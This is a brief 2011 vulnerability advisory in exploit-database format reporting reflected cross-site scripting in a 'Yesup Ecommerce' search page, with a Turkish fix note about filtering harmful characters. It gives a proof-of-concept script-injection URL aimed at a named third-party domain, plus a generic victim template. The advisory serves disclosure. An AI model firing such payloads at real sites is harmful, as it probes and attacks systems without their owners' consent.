< ------------------- header data start ------------------- >

# Application Name: Yesup Ecommerce Cross Site Scripting Vulnerability

# Author: expulse ~ Bug Researchers

# Date: 27.06.2011

# Example: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>alert(document.domain)</script>

# Vulnerable Type: Reflected XSS

# Fixed: Zararli Karakterler Filitrelenmelidir.


< -- bug code start -- >

http://victim/yesupSearch/web.php?q=XSSAttack]

< -- bug code end of -- >

< ------------------- header data end of ------------------- >